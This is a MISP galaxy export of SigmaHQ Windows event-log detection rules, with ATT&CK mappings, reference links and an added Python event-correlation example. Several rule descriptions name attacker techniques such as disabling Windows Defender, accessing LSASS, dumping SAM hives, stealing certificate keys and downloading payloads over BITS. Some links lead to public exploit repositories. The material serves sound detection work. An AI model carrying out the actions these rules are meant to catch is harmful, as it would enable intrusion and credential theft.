https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml

Scheduled Task Executed From A Suspicious Location

Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or it is an unusual program to be run from a Scheduled Task

The tag is: misp-galaxy:sigma-rules="Scheduled Task Executed From A Suspicious Location"

Scheduled Task Executed From A Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9134. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml

Important Scheduled Task Deleted

Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

The tag is: misp-galaxy:sigma-rules="Important Scheduled Task Deleted"

Important Scheduled Task Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 9135. Table References

Links

https://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml

USB Device Plugged

Detects plugged/unplugged USB devices

The tag is: misp-galaxy:sigma-rules="USB Device Plugged"

USB Device Plugged has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

Table 9136. Table References

Links

https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/

https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml

Loading Diagcab Package From Remote Path

Detects loading of diagcab packages from a remote path, as seen in the DogWalk vulnerability

The tag is: misp-galaxy:sigma-rules="Loading Diagcab Package From Remote Path"

Table 9137. Table References

Links

https://twitter.com/nas_bench/status/1539679555908141061

https://twitter.com/j00sean/status/1537750439701225472

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml

CodeIntegrity - Blocked Image/Driver Load For Policy Violation

Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.

The tag is: misp-galaxy:sigma-rules="CodeIntegrity - Blocked Image/Driver Load For Policy Violation"

CodeIntegrity - Blocked Image/Driver Load For Policy Violation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9145. Table References

Links

https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log

https://twitter.com/wdormann/status/1590434950335320065

https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml

CodeIntegrity - Blocked Driver Load With Revoked Certificate

Detects blocked load attempts of revoked drivers

The tag is: misp-galaxy:sigma-rules="CodeIntegrity - Blocked Driver Load With Revoked Certificate"

CodeIntegrity - Blocked Driver Load With Revoked Certificate has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9146. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations

Internal Research

https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml

Suspicious Rejected SMB Guest Logon From IP

Detects attempted PrintNightmare (CVE-2021-1675) remote code execution in the Windows Spooler Service

The tag is: misp-galaxy:sigma-rules="Suspicious Rejected SMB Guest Logon From IP"

Suspicious Rejected SMB Guest Logon From IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

Table 9148. Table References

Links

https://github.com/hhlxf/PrintNightmare

https://github.com/afwu/PrintNightmare

https://twitter.com/KevTheHermit/status/1410203844064301056

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml

Suspicious Application Installed

Detects a suspicious application installation by looking at the shortcut added to the app resolver cache

The tag is: misp-galaxy:sigma-rules="Suspicious Application Installed"

Table 9149. Table References

Links

https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml

Sysinternals Tools AppX Versions Execution

Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths

The tag is: misp-galaxy:sigma-rules="Sysinternals Tools AppX Versions Execution"

Table 9152. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml

Microsoft Defender Tamper Protection Trigger

Detects blocked attempts to change any of Defender’s settings such as "Real Time Monitoring" and "Behavior Monitoring"

The tag is: misp-galaxy:sigma-rules="Microsoft Defender Tamper Protection Trigger"

Microsoft Defender Tamper Protection Trigger has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9153. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide

https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml

Windows Defender AMSI Trigger Detected

Detects triggering of AMSI by Windows Defender.

The tag is: misp-galaxy:sigma-rules="Windows Defender AMSI Trigger Detected"

Windows Defender AMSI Trigger Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9154. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_malware_detected_amsi_source.yml

Windows Defender Real-time Protection Disabled

Detects disabling of Windows Defender Real-time Protection. As this event doesn’t contain a lot of information on who initiated this action, you might want to reduce it to a "medium" level if this occurs too many times in your environment

The tag is: misp-galaxy:sigma-rules="Windows Defender Real-time Protection Disabled"

Windows Defender Real-time Protection Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9155. Table References

Links

https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_disabled.yml

Windows Defender Malware And PUA Scanning Disabled

Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software

The tag is: misp-galaxy:sigma-rules="Windows Defender Malware And PUA Scanning Disabled"

Windows Defender Malware And PUA Scanning Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9156. Table References

Links

https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml

Windows Defender Virus Scanning Feature Disabled

Detects disabling of the Windows Defender virus scanning feature

The tag is: misp-galaxy:sigma-rules="Windows Defender Virus Scanning Feature Disabled"

Windows Defender Virus Scanning Feature Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9157. Table References

Links

https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_virus_scan_disabled.yml

Windows Defender Exclusions Added

Detects the setting of Windows Defender exclusions

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusions Added"

Windows Defender Exclusions Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9158. Table References

Links

https://twitter.com/_nullbind/status/1204923340810543109

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_exclusion_added.yml

LSASS Access Detected via Attack Surface Reduction

Detects access to the LSASS process

The tag is: misp-galaxy:sigma-rules="LSASS Access Detected via Attack Surface Reduction"

LSASS Access Detected via Attack Surface Reduction has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9159. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_asr_lsass_access.yml

Windows Defender Real-Time Protection Failure/Restart

Detects issues with Windows Defender Real-Time Protection features

The tag is: misp-galaxy:sigma-rules="Windows Defender Real-Time Protection Failure/Restart"

Windows Defender Real-Time Protection Failure/Restart has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9160. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/

Internal Research

https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml

Windows Defender Grace Period Expired

Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.

The tag is: misp-galaxy:sigma-rules="Windows Defender Grace Period Expired"

Windows Defender Grace Period Expired has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9162. Table References

Links

https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_antimalware_platform_expired.yml

Windows Defender Submit Sample Feature Disabled

Detects disabling of the "Automatic Sample Submission" feature of Windows Defender.

The tag is: misp-galaxy:sigma-rules="Windows Defender Submit Sample Feature Disabled"

Windows Defender Submit Sample Feature Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9163. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide

https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_sample_submission_consent.yml

Windows Defender Threat Detected

Detects actions taken by Windows Defender malware detection engines

The tag is: misp-galaxy:sigma-rules="Windows Defender Threat Detected"

Windows Defender Threat Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9164. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml

Windows Defender Configuration Changes

Detects suspicious changes to the Windows Defender configuration

The tag is: misp-galaxy:sigma-rules="Windows Defender Configuration Changes"

Windows Defender Configuration Changes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9165. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide

https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml

Windows Defender Exploit Guard Tamper

Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications"

The tag is: misp-galaxy:sigma-rules="Windows Defender Exploit Guard Tamper"

Windows Defender Exploit Guard Tamper has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9166. Table References

Links

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml

Win Defender Restored Quarantine File

Detects the restoration of files from the Defender quarantine

The tag is: misp-galaxy:sigma-rules="Win Defender Restored Quarantine File"

Win Defender Restored Quarantine File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9167. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_restored_quarantine_file.yml

PSExec and WMI Process Creations Block

Detects blocking of process creations originating from PSExec and WMI commands

The tag is: misp-galaxy:sigma-rules="PSExec and WMI Process Creations Block"

PSExec and WMI Process Creations Block has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9168. Table References

Links

https://twitter.com/duff22b/status/1280166329660497920

https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_asr_psexec_wmi.yml

BITS Transfer Job Downloading File Potential Suspicious Extension

Detects new BITS transfer job saving local files with potential suspicious extensions

The tag is: misp-galaxy:sigma-rules="BITS Transfer Job Downloading File Potential Suspicious Extension"

BITS Transfer Job Downloading File Potential Suspicious Extension has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9169. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml

BITS Transfer Job With Uncommon Or Suspicious Remote TLD

Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.

The tag is: misp-galaxy:sigma-rules="BITS Transfer Job With Uncommon Or Suspicious Remote TLD"

BITS Transfer Job With Uncommon Or Suspicious Remote TLD has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9170. Table References

Links

https://twitter.com/malmoeb/status/1535142803075960832

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml

BITS Transfer Job Download To Potential Suspicious Folder

Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location

The tag is: misp-galaxy:sigma-rules="BITS Transfer Job Download To Potential Suspicious Folder"

BITS Transfer Job Download To Potential Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9171. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml

New BITS Job Created Via PowerShell

Detects the creation of a new BITS job by PowerShell

The tag is: misp-galaxy:sigma-rules="New BITS Job Created Via PowerShell"

New BITS Job Created Via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9172. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_job_via_powershell.yml

BITS Transfer Job Download From Direct IP

Detects a BITS transfer job downloading file(s) from a direct IP address.

The tag is: misp-galaxy:sigma-rules="BITS Transfer Job Download From Direct IP"

BITS Transfer Job Download From Direct IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9173. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml

New BITS Job Created Via Bitsadmin

Detects the creation of a new BITS job by Bitsadmin

The tag is: misp-galaxy:sigma-rules="New BITS Job Created Via Bitsadmin"

New BITS Job Created Via Bitsadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 9174. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml

Certificate Private Key Acquired

Detects when an application acquires a certificate private key

The tag is: misp-galaxy:sigma-rules="Certificate Private Key Acquired"

Certificate Private Key Acquired has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Authentication Certificates - T1649" with estimative-language:likelihood-probability="almost-certain"

Table 9176. Table References

Links

https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/capi2/win_capi2_acquire_certificate_private_key.yml

Ngrok Usage with Remote Desktop Service

Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour

The tag is: misp-galaxy:sigma-rules="Ngrok Usage with Remote Desktop Service"

Ngrok Usage with Remote Desktop Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 9177. Table References

Links

https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg

https://ngrok.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml

Failed DNS Zone Transfer

Detects when a DNS zone transfer failed.

The tag is: misp-galaxy:sigma-rules="Failed DNS Zone Transfer"

Failed DNS Zone Transfer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1590.002" with estimative-language:likelihood-probability="almost-certain"

Table 9178. Table References

Links

https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml

DNS Server Error Failed Loading the ServerLevelPluginDLL

Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded

The tag is: misp-galaxy:sigma-rules="DNS Server Error Failed Loading the ServerLevelPluginDLL"

DNS Server Error Failed Loading the ServerLevelPluginDLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9179. Table References

Links

https://twitter.com/gentilkiwi/status/861641945944391680

https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx

https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml

Windows Update Error

Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren’t installed.

The tag is: misp-galaxy:sigma-rules="Windows Update Error"

Windows Update Error has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584" with estimative-language:likelihood-probability="almost-certain"

Table 9180. Table References

Links

https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml

Critical Hive In Suspicious Location Access Bits Cleared

Detects events from the Kernel-General ETW provider indicating that the access bits of a hive with a system-like hive name, located in the temp directory, have been reset. This occurs when an application tries to access a hive that has not been recognized in the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.

The tag is: misp-galaxy:sigma-rules="Critical Hive In Suspicious Location Access Bits Cleared"

Critical Hive In Suspicious Location Access Bits Cleared has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 9181. Table References

Links

https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kernel_general/win_system_susp_critical_hive_location_access_bits_cleared.yml

Potential RDP Exploit CVE-2019-0708

Detects suspicious RDP protocol errors that may indicate an exploitation attempt of CVE-2019-0708 (BlueKeep)

The tag is: misp-galaxy:sigma-rules="Potential RDP Exploit CVE-2019-0708"

Potential RDP Exploit CVE-2019-0708 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 9182. Table References

Links

https://github.com/Ekultek/BlueKeep

https://github.com/zerosum0x0/CVE-2019-0708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml

Volume Shadow Copy Mount

Detects volume shadow copy mount via Windows event log

The tag is: misp-galaxy:sigma-rules="Volume Shadow Copy Mount"

Volume Shadow Copy Mount has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 9183. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_ntfs/win_system_volume_shadow_copy_mount.yml

Suspicious Usage of CVE_2021_34484 or CVE 2022_21919

During exploitation of this vulnerability, two events (Provider_Name: Microsoft-Windows-User Profiles Service) with Event IDs 1511 and 1515 are created; Event ID 1515 on its own may produce many false positives. Moreover, it appears that the directory \Users\TEMP may be created during exploitation. Observed on Windows Server 2008.

The tag is: misp-galaxy:sigma-rules="Suspicious Usage of CVE_2021_34484 or CVE 2022_21919"

Table 9184. Table References

Links

https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml
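The following is an added example, not part of the MISP galaxy export or of the SigmaHQ rule it summarises. It turns the description above into a small correlation check over constructed log records: a host is reported only when a 1511 and a 1515 from the User Profiles Service provider occur close together, which suppresses the noise the description warns about for 1515 alone, and a separate helper recognises the \Users\TEMP directory. The 60-second window, the record layout and the sample records are assumptions of this example; the page gives none of them.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, Iterable, List

# Provider and event IDs named in the rule description.
PROFILE_SERVICE_PROVIDER = "Microsoft-Windows-User Profiles Service"
PROFILE_EVENT_IDS = (1511, 1515)
# Assumed correlation window; the page does not state one.
DEFAULT_WINDOW = timedelta(seconds=60)


@dataclass(frozen=True)
class LogRecord:
    timestamp: datetime
    host: str
    provider: str
    event_id: int


def correlate_profile_events(records: Iterable[LogRecord],
                             window: timedelta = DEFAULT_WINDOW) -> List[str]:
    """Return the hosts on which a 1511 and a 1515 from the User Profiles
    Service occur within `window` of each other. Requiring both events
    keeps the noisy 1515-only case out of the result."""
    per_host: Dict[str, Dict[int, List[datetime]]] = {}
    for rec in records:
        if rec.provider != PROFILE_SERVICE_PROVIDER or rec.event_id not in PROFILE_EVENT_IDS:
            continue
        per_host.setdefault(rec.host, {}).setdefault(rec.event_id, []).append(rec.timestamp)

    hits = []
    for host, by_id in per_host.items():
        first = by_id.get(1511, [])
        second = by_id.get(1515, [])
        if any(abs(a - b) <= window for a in first for b in second):
            hits.append(host)
    return sorted(hits)


def is_temp_profile_dir(path: str) -> bool:
    """True when `path` is the \\Users\\TEMP directory the description
    mentions, on any drive letter and with either separator; sibling names
    such as \\Users\\TEMPUSER and subdirectories do not match."""
    norm = path.replace("/", "\\").rstrip("\\").lower()
    return norm.endswith("\\users\\temp")


# Constructed sample records (not real logs).
T0 = datetime(2022, 1, 20, 10, 0, 0)
SAMPLE_RECORDS = [
    # ws01: both events three seconds apart -> reported
    LogRecord(T0, "ws01", PROFILE_SERVICE_PROVIDER, 1511),
    LogRecord(T0 + timedelta(seconds=3), "ws01", PROFILE_SERVICE_PROVIDER, 1515),
    # ws02: 1515 alone (the noisy event) -> not reported
    LogRecord(T0 + timedelta(minutes=5), "ws02", PROFILE_SERVICE_PROVIDER, 1515),
    # ws03: both events, but ten minutes apart -> outside the default window
    LogRecord(T0 + timedelta(hours=1), "ws03", PROFILE_SERVICE_PROVIDER, 1511),
    LogRecord(T0 + timedelta(hours=1, minutes=10), "ws03", PROFILE_SERVICE_PROVIDER, 1515),
    # ws04: same IDs from a different provider -> ignored
    LogRecord(T0, "ws04", "Microsoft-Windows-Other", 1511),
    LogRecord(T0, "ws04", "Microsoft-Windows-Other", 1515),
]

if __name__ == "__main__":
    print("hosts with correlated 1511/1515:", correlate_profile_events(SAMPLE_RECORDS))
    print("C:\\Users\\TEMP is the temp profile dir:", is_temp_profile_dir(r"C:\Users\TEMP"))
```

Widening the window (for example to fifteen minutes) brings ws03 into the result; tune it against the timing observed in your own environment rather than the value assumed here.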

NTFS Vulnerability Exploitation

Detects the exploitation of an NTFS vulnerability that was reported, without many details, via Twitter

The tag is: misp-galaxy:sigma-rules="NTFS Vulnerability Exploitation"

NTFS Vulnerability Exploitation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Exhaustion Flood - T1499.001" with estimative-language:likelihood-probability="almost-certain"

Table 9185. Table References

Links

https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/

https://twitter.com/wdormann/status/1347958161609809921

https://twitter.com/jonasLyk/status/1347900440000811010

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml

Local Privilege Escalation Indicator TabTip

Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode

The tag is: misp-galaxy:sigma-rules="Local Privilege Escalation Indicator TabTip"

Local Privilege Escalation Indicator TabTip has relationships with:

